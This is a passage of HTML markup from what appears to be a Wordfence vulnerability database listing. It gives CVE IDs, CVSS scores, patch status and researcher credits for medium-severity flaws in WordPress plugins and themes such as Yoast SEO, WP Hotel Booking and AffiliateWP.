<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/914554fd-1525-4925-bce4-2df4a8df5dbf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39286096-2efa-450b-b491-b3d40de5a4ae" target="_blank" rel="noopener">Web Push Notifications &lt;= 4.39.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;webpushr_notification_title&#8217; Post Meta Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9729" target="_blank" rel="noopener noreferrer">							CVE-2026-9729						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/webpushr-web-push-notifications" target="_blank" rel="noopener">Web Push Notifications – Webpushr</a> <span class="wfvr-software-slug">[webpushr-web-push-notifications]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39286096-2efa-450b-b491-b3d40de5a4ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f3a4258-2f45-4617-a5ca-9b28835ef405" target="_blank" rel="noopener">WP Hotel Booking &lt;= 2.3.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;widget_search&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15464" target="_blank" rel="noopener noreferrer">							CVE-2026-15464						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">WP Hotel Booking</a> <span class="wfvr-software-slug">[wp-hotel-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f3a4258-2f45-4617-a5ca-9b28835ef405" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6f3bcf70-2900-4a13-9ed4-264a15af9725" target="_blank" rel="noopener">WP Shortcode by MyThemeShop &lt;= 1.4.17 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;title&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9635" target="_blank" rel="noopener noreferrer">							CVE-2026-9635						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-shortcode" target="_blank" rel="noopener">WP Shortcode by MyThemeShop</a> <span class="wfvr-software-slug">[wp-shortcode]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6f3bcf70-2900-4a13-9ed4-264a15af9725" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2fa1b7-a5af-4ea6-9bee-19a6cdfd7701" target="_blank" rel="noopener">Yoast SEO &lt;= 28.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via Post Slug (post_name)</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15425" target="_blank" rel="noopener noreferrer">							CVE-2026-15425						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordpress-seo" target="_blank" rel="noopener">Yoast SEO – Advanced SEO with real-time guidance and built-in AI</a> <span class="wfvr-software-slug">[wordpress-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2fa1b7-a5af-4ea6-9bee-19a6cdfd7701" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0183866d-1eab-4982-b62e-77751c7e738c" target="_blank" rel="noopener">Premium Packages &lt;= 7.0.4 &#8211; Authentication Bypass to Non-Admin via &#8216;wpdmppdl&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15348" target="_blank" rel="noopener noreferrer">							CVE-2026-15348						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0183866d-1eab-4982-b62e-77751c7e738c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b879d6a9-dd75-4c53-867b-dd36a9afe4b3" target="_blank" rel="noopener">AffiliateWP &lt;= 2.34.0 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57809" target="_blank" rel="noopener noreferrer">							CVE-2026-57809						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">AffiliateWP</a> <span class="wfvr-software-slug">[affiliate-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b879d6a9-dd75-4c53-867b-dd36a9afe4b3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a934aad-5097-4fec-871b-4eb601240db2" target="_blank" rel="noopener">Grand Photography WordPress &lt;= 5.7.8 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57769" target="_blank" rel="noopener noreferrer">							CVE-2026-57769						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/grandphotography" target="_blank" rel="noopener">Grand Photography WordPress</a> <span class="wfvr-software-slug">[grandphotography]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a934aad-5097-4fec-871b-4eb601240db2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdbcfc7-1db6-4379-98fb-af2e1a7a7aaf" target="_blank" rel="noopener">Real Estate Manager Pro &lt;= 12.8.5 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57701" target="_blank" rel="noopener noreferrer">							CVE-2026-57701						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-manager-pro" target="_blank" rel="noopener">Real Estate Manager Pro</a> <span class="wfvr-software-slug">[real-estate-manager-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdbcfc7-1db6-4379-98fb-af2e1a7a7aaf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e456b8c8-ba4a-4199-b006-c6be381b6ef8" target="_blank" rel="noopener">VikBooking Hotel Booking Engine &amp; PMS &lt;= 1.8.13 &#8211; Reflected Cross-Site Scripting via &#8216;category_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15346" target="_blank" rel="noopener noreferrer">							CVE-2026-15346						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikbooking" target="_blank" rel="noopener">VikBooking Hotel Booking Engine &amp; PMS</a> <span class="wfvr-software-slug">[vikbooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e456b8c8-ba4a-4199-b006-c6be381b6ef8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37f7f826-cb60-4e25-9a02-f18a0ace0a75" target="_blank" rel="noopener">AWP Classifieds &lt;= 4.4.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65469" target="_blank" rel="noopener noreferrer">							CVE-2026-65469						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/another-wordpress-classifieds-plugin" target="_blank" rel="noopener">AWP Classifieds</a> <span class="wfvr-software-slug">[another-wordpress-classifieds-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/76b37473036c0cad989fac58fdce9e75.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="76b37473036c0cad989fac58fdce9e75"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener">z3r0s</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37f7f826-cb60-4e25-9a02-f18a0ace0a75" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d85e42-4872-4fc4-9e6f-4b9d9fb75ef2" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment &lt;= 2.7.2 &#8211; Unauthenticated Price Maniputlation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59532" target="_blank" rel="noopener noreferrer">							CVE-2026-59532						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</a> <span class="wfvr-software-slug">[booking-and-rental-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d85e42-4872-4fc4-9e6f-4b9d9fb75ef2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f23bb22c-2f7b-4940-b0bc-1e5f2b8d0ed2" target="_blank" rel="noopener">Byteflows Travel &amp; Hotel Booking &lt;= 1.0.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59548" target="_blank" rel="noopener noreferrer">							CVE-2026-59548						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/byteflows-travel-hotel-booking" target="_blank" rel="noopener">Byteflows Travel &amp; Hotel Booking</a> <span class="wfvr-software-slug">[byteflows-travel-hotel-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f23bb22c-2f7b-4940-b0bc-1e5f2b8d0ed2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9370cf3f-27bd-42f7-bd0c-88dcb86fd459" target="_blank" rel="noopener">Civi &#8211; Job Board &amp; Freelance Marketplace WordPress Theme &lt;= 2.2.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65476" target="_blank" rel="noopener noreferrer">							CVE-2026-65476						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/civi" target="_blank" rel="noopener">Civi &#8211; Job Board &amp; Freelance Marketplace WordPress Theme</a> <span class="wfvr-software-slug">[civi]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9370cf3f-27bd-42f7-bd0c-88dcb86fd459" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7364f803-9808-4337-8922-2d7c88849361" target="_blank" rel="noopener">Civi Framework &lt;= 2.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65525" target="_blank" rel="noopener noreferrer">							CVE-2026-65525						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
